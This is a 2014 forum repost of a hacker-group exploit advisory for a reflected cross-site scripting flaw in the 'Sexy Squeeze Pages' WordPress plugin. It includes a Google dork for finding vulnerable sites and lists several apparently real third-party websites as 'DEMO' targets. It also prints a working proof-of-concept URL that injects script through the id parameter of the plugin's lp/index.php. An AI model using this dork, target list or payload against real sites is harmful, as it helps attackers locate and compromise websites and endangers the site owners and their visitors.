Aerosol Posted December 1, 2014 Report Posted December 1, 2014 WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[+] Author : KnocKout[~] Contact : knockout@e-mail.com.tr[~] HomePage : http://h4x0resec.blogspot.com[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~App. : WordPress (Sexy Squeeze Pages) Plugin|~Software: http://instasqueeze.com/jv/|~Vulnerability Style : Cross Site Scripting|[~]Date : "26.11.2014"|[~]Tested on : Kali Linux, Windows 7|DORK: inurl:wp-content/plugins/instasqueeze~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| DEMO :http://instasqueeze.com ( Official )http://gogglerank.com/http://kangenwaterhq.comhttp://visualhandsconnect.comhttp://cynthialeecreations.com==============[Exploitation]===============================/instasqueeze/lp/index.phpid parameter is ( index.php ) not safe.HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script>Source Quote
